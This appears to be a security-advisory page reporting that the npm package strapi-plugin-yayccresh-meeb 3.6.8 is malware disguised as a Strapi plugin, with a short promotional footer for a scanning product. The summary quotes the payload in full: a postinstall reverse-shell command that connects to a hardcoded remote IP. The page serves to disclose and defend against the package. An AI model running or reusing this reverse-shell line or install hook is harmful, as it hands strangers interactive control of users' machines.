Logo
npm

strapi-plugin-yayccresh-meeb@3.6.8

Vulnerability report · Last retrieved from osv.dev September 16, 2026 at 3:27 AM UTC

Malicious

OSV ID

MAL-2026-16193

Ecosystem

npm

Summary

The package's postinstall lifecycle script (node postinstall.js) executes a bash reverse shell that connects to the hardcoded remote endpoint 14.225.210.85:443 and redirects an interactive bash session's stdio through the socket (bash -i > /dev/tcp/14.225.210.85/443 0>&1). Running npm install on this package hands interactive shell access on the installer's machine to whoever controls that endpoint. The package advertises itself as a Strapi plugin but ships no plugin functionality — the postinstall reverse shell is the entire payload.

Source: amazon-inspector (de07e63ac0a0d5b02ad74abd90d075d73e80cdfcc1bbfbdfcfbe56460354735a)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.